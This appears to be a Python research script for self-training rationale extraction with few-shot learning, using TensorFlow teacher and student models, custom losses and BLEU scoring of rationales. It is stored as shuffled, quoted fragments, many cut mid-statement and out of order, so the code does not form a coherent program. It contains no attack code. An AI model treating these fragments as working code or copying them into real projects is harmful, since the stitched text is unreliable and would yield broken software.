{}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus = strategy.num_replicas_in_sync logger.info('Number of devices:", "pred_1, pred_0, truth_1, truth_0 = 0, 0, 0, 0 for i in range(len(test_pred)):", "+= nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1))", "= tp/(tp+fp+0.0000001) r = tp/(tp+fn+0.0000001) logger.info(\"Token-level: {}\".format((tp)/(tp+(0.5*(fp+fn))))) logger.info(\"Rationale coverage (recall): {}\".format(r)) logger.info(\"Token Precision:", "\"token_type_ids_r\":X[\"token_type_ids_r\"][train_size:], \"attention_mask_r\":X[\"attention_mask_r\"][train_size:]}, y[train_size:] else: X_train, y_train = 
{\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]},", "on the unlabeled set if sample_size < len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {}", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss =", "axis=-1) #logger.info(\"Micro score (task): {}\".format(precision_recall_fscore_support(acc, y_test[:,0], average='micro'))) elif 'joint' in type_: out =", "if '_neg' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size],", "+ 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model", "[y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0],", "= y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0] y_val = acc y_rat", "out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)), 1/len(labels))]) task_acc, test_acc, r_acc =", "(\"Model file loaded from {}\".format(model_file)) continue if 'mtl' in type_ : acc, y_pred", "#y_batch = np.concatenate((acc[indices], y_pred), axis=1) acc = acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1)", "hidden_dropout_prob=hidden_dropout_prob) loss_weights = [1.0, 1.0, 1.0, 1.0] if '_noexp' in type_: loss_weights =", "max_task_acc = task_acc model.save_weights(model_file_best) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] test_task_acc = model.evaluate(X_test,", "collections import defaultdict 
from sklearn.utils import shuffle from transformers import * import logging", "{} number of instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]),", "acc, y_pred, r_acc = out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat =", "y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),", "= tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss +", "custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config,", "'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel,", "= model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1) elif 'joint' in type_: out = model.predict(X_test)", "0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set (student model): {}", "for i in range(len(test_pred)): temp_p, temp_t, ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:]", "task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc model.save_weights(model_file_best) val_acc", "confidence on {} number of instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices", "temp_p: if word in temp_t: ct+=1 temp_t.remove(word) else: fp+=1 tp +=ct fn +=", "for task (macro/task): 
{}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev],", "y_val = acc y_rat = np.array(y_pred).astype('float') #y_rat = y_rat[:,1:] #y_pred = y_pred[:,1:] else:", "sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)])", "logger.info(\"BLEU-4 score of rationales on test set (student model): {} \".format(score4/len(pred))) data =", "axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] = 1 X_sample", "r_acc = out[3], out[4], out[5] logger.info (\"Test token acc for run {} :", "selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1)))) attention_mask_r[:,0] = 1 negation_mask = np.where(attention_mask_r==0, 1, 0) negation_mask[:,0] =", "y_pred), axis=1) acc = acc[:,None] y_batch = np.concatenate((acc, y_pred), axis=1) logging.info(\"y_batch shape {}\".format(y_batch.shape))", "1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return", "loss_weights = [1.0, 1.0, 1.0, 1.0] ''' if '_noexp' in type_: loss_weights =", "'.join(text) temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir,", "\"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X, y X_dev, y_dev = X_dev,", "0.00000001) if 'norm' in type_: X_conf[:,0] = tf.nn.softmax(X_conf[:,0], axis=0) if '_r_' in type_:", 
"'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary())", "in type_: acc, y_pred = model_student.predict(X_test) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc,", "'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices] elif 'joint' in type_: X_unlabeled_sample, y_pred", "K import tensorflow.keras.backend as kb import tensorflow_addons as tfa from focal_loss import BinaryFocalLoss,", "\"\"\" Author: <NAME> (<EMAIL>) Code for Self-training for Rationale using few-shot learning. 
This", "verbose=0)[-3] ''' if val_loss < best_loss: best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model)", "data on student model for run {}: {}\".format(counter, test_pred)) tp, fn, fp =", "restore_best_weights=True)]) # class_weight=class_weight) tf.keras.backend.clear_session() if not os.path.exists(model_file): model.save_weights(model_file) logger.info (\"Model file saved to", "task_acc model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3]", "else: X_train, y_train = X, y X_dev, y_dev = X_dev, y_dev logger.info(\"X Train", "= out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred", "y_dev[:,0], np.ones(len(y_dev))]), batch_size=sup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='loss', patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev,", "= None if '_noexp' in type_: loss_weights = [1.0, 0.0] else: loss_weights =", "rationales\") with strategy.scope(): def custom_loss(y_true, y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) tf.print(tf.size(y_true), tf.size(y_pred)) cce_loss", "type_=\"token\", X_dev=None, y_dev=None, task=None): #labels = [0, 1] #fix hardcoding labels = set(y[:,0])", "labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X and y to train", "y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2]", "out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred, axis=-1) acc = np.argmax(acc,", "{} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': 
X_unlabeled[\"token_type_ids\"][indices],", "[y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task)", "y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss", "batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss = None", "= text temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with", "'joint' in type_: if 'pruthi_' in type_: out = y_train acc, y_pred, r_acc", "max_learn_rate*math.exp(math.log(end_learn_rate/max_learn_rate)*(epoch-warmup_epoch_count+1)/(total_epoch_count-warmup_epoch_count+1)) return float(res) learning_rate_scheduler = tf.keras.callbacks.LearningRateScheduler(lr_scheduler, verbose=1) return learning_rate_scheduler def train_model(max_seq_length, X, y,", "rationales on test set (teacher model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on", "np.argmax(acc, axis=-1) elif 'joint' in type_: if 'pruthi_' in type_: out = y_train", "= np.inf for counter in range(N_base): #original N_base=10 with strategy.scope(): if 'mtl' in", "logger.info(\"BLEU-2 score of rationales on test set (teacher model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score", "= ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss =", "= 0.0, 0.0, 0.0, 0.0 for i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1,", "model based on 
validation loss best_base_model = None best_validation_loss = np.inf for counter", "acc, y_pred, r_acc = out[0], out[1], out[2] logger.info(\"Raw logits: {}\".format(acc)) y_pred = np.argmax(y_pred,", "'mtl' in type_: rat_loss = None if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2)", "y_pred1 = np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model", "max_test_acc = test_acc test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg'", "= os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir, \"model_task.h5\") model_file_best = os.path.join(model_dir, \"model_best.h5\") if os.path.exists(model_file):", "y_pred[indices] if type_ == 'decoupled' or ('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices],", "= model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[0] elif '_neg' in type_: out = model.evaluate(X_test, [y_test[:,0],", "validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight)", "weights=(0, 0, 0, 1)) logger.info(\"BLEU-1 score of rationales on test set (student model):", "103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:],", "in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config,", "y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)", 
"callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif type_ == 'joint': logger.info(type_) def custom_loss(y_true,", "('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\": X_sample['attention_mask'][indices]} ''' #acc", "'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg],", "rationales on test set (student model): {} \".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on", "batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] #y_val = np.amax(acc, axis=-1) #y_rat", "out[2] #y_val = np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1)", "counter in range(N_base): #original N_base=10 with strategy.scope(): if 'mtl' in type_: rat_loss =", "np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for", "np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten()", "X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha '''", "'w') as f: json.dump(data, f) model_student = None # model_task for epoch in", "epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 
'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None})", "= y_val[indices] probs_rat = y_rat[indices] cls = list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length))", "sys import json import nltk import tensorflow as tf import tensorflow.keras as K", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model = models.construct_teacher_mtl(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "# class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]) logger.info (\"Validation loss for", "'joint' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl'", "test_acc, r_acc = out[3], out[4], out[5] logger.info (\"Test token acc for run {}", "strategy.scope(): if 'mtl' in type_: rat_loss = None if 'focal' in type_: rat_loss", "0, 1)) logger.info(\"BLEU-1 score of rationales on test set (teacher model): {} \".format(score1/len(pred)))", "X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10) if 'rwt'", "initialization to select best base model based on validation loss best_base_model = None", "[y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], 
verbose=0)[-3] ''' if val_loss < best_loss: best_loss = val_loss", "elif type_ == 'joint': rat_loss = None if 'focal' in type_: rat_loss =", "'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_: rat_loss = None if 'focal' in", "loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task = os.path.join(model_dir,", "0, 0, 0, 0 for i in range(len(test_pred)): temp_p, temp_t, ct = [],[],", "rationales on test set (student model): {} \".format(score4/len(pred))) data = [] for i", "[y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc", "validation acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file):", "if test_task_acc >= max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task", "pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout, attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #,", "#.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: if 'pruthi_' in type_:", "data.append(temp) with open(os.path.join(model_dir, 'rationale_output_test_'+type_+'.json'), 'w') as f: json.dump(data, f) logger.info (\"Best accuracy (task)", "model.save_weights(model_file_best) #_student = 
deepcopy(model) val_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] '''", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0) elif 'mtl' in type_: temp = model.evaluate(X_test,", "{'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5]) if 'joint' in type_: ids", "best_base_model ''' if 'mtl' in type_: logger.info (\"Best validation acc for base model", "class_acc, test_pred, r_acc = out[0], out[1], out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions", "< len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_pred[indices] if", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch) X_batch['input_ids_r'], X_batch['token_type_ids_r'], X_batch['attention_mask_r']", "'_neg' in type_: X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i", "= indx[:unsup_size] logger.info(\"Shape of predicted labels for class {} : {}\".format(i, len(indx))) indices.extend(indx)", "attention_probs_dropout_prob=attention_probs_dropout_prob, hidden_dropout_prob=hidden_dropout_prob) 
model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") elif type_ ==", "sample_scheme='easy_bald_class_conf', T=30, alpha=0.1, valid_split=0.5, sup_epochs=70, unsup_epochs=25, N_base=10, dense_dropout=0.5, attention_probs_dropout_prob=0.3, hidden_dropout_prob=0.3, test_data=None, unlabeled_data=None, class_weight=None,", "= np.amax(acc, axis=-1) #y_rat = np.amax(y_pred, axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc", "= y_pred[:,1:] # sample from unlabeled set if 'uni' in sample_scheme: logger.info (\"Sampling", "X_conf = np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at the", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task)", "{'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices], 'input_ids_neg':X_unlabeled['input_ids_neg'][indices], 'token_type_ids_neg':X_unlabeled['token_type_ids_neg'][indices], 'attention_mask_neg':X_unlabeled['attention_mask_neg'][indices]}, y_pred[indices]", "axis=-1) y_pred = np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc,", "ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] for j in range(0,len(test_pred[0])-1): if test_pred[i][j]", "'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = 
model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc =", "set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test set (student", "acc (task) {}\".format(task_acc)) logger.info (\"Test acc (task) {}\".format(test_task_acc)) if test_task_acc >= max_best_acc: max_best_acc", "'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights) y_neg = np.full((len(y_train),len(labels)), 1/len(labels)) model.fit(x=X_train, y=[y_train[:,0],", "task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[0]", "test_task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))], verbose=0)[-3] if '_neg' in type_: y_neg_dev", "elif 'joint' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices],", "y[train_size:] else: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\": X[\"attention_mask\"][:train_size]}, y[:train_size] X_dev,", "tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'l2_distance': custom_loss}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 
'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance':None}) #model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08),", "best_validation_loss = np.inf for counter in range(N_base): #original N_base=10 with strategy.scope(): if 'mtl'", "0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model =", "(micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token Predictions shape {}\".format(test_pred.shape)) pred, truth = [], []", "y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_:", "i in range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text temp['truth']", "loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier':None}, loss_weights=loss_weights)", "[0.5, 0.5] with strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], 
metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train,", "len(X_unlabeled[\"input_ids\"]): logger.info (\"Evaluating confidence on {} number of instances sampled from {} unlabeled", "y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[0] if task_acc", "<gh_stars>0 \"\"\" Author: <NAME> (<EMAIL>) Code for Self-training for Rationale using few-shot learning.", "loss_weights = [1.0, 1.0, 1.0, 1.0] if '_noexp' in type_: loss_weights = [1.0,", "\"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch = {\"input_ids_r\": X_sample['input_ids'][indices], \"token_type_ids_r\": X_sample['token_type_ids'][indices],", "= 0. max_task_acc = 0. max_best_acc = 0. val_loss = 0. if 'mtl'", "test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append(' '.join(temp_t)) for", "= tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) loss_weights = None if '_noexp' in type_: loss_weights = [1.0, 0.0]", "warmup_epoch_count=10, total_epoch_count=90): def lr_scheduler(epoch): if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch", 